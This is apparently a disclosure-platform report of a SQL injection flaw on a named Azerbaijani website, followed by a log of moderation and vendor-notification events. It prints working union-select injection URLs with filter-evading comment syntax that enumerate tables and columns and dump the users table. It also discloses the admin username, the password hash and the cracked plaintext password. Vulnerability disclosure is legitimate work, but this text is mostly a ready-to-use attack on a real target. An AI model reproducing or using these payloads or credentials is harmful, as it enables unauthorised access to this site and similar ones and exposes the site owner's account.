SQL injection

Detailed information

SQl inject here: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27%20%2F*!12345union*%2F%20%2F*!12345select*%2F%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11--%20-%27
Table names: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(table_name)*/,9,10,11+/*!12345from*/+/*!12345information_schema.tables*/+/*!12345where*/+/*!12345table_schema=database()*/--+-%27
USers: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(column_name)*/,9,10,11+/*!12345from*/+/*!12345information_schema.columns*/+/*!12345where*/+/*!12345table_name=0x7573657273*/--+-%27
Username and password dump: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(username,0x3a,password)*/,9,10,11+/*!12345from*/+/*!12345users*/--+-%27
username: admin
password: 5edc2995b340ac9fd2cc555e94384c87 md5 hash( makaudit123 )

Screens

Comments

• 21 October 2016, 14:01
  Vulnerability status
  Have not any information from source

• 04 October 2016, 10:04
  Added point to Vulnerability
  For translate of bug gived 10 point to translator

• 04 October 2016, 10:04
  Added point to Vulnerability
  For translate of bug gived 1 point to translator

• 07 September 2016, 13:51
  Vulnerability status
  Sended e-mail to source about vulnerability

• 07 September 2016, 11:31
  Added point to Vulnerability
  Moderator gave 10 point from 10 to vulnerability

• 07 September 2016, 11:12
  Vulnerability status
  Confirmed by Moderator

• 06 September 2016, 18:03
  Vulnerability changed
  Vulnerability "SQL injection" changed

• 30 June 2016, 14:49
  Vulnerability cancelled
  Linklər qeyd edilən məlumatı göstərmir. Zəhmət lmasa screenlər yollayın.

• 22 June 2016, 12:06
  Vulnerability added
  Vulnerability added to BUGemot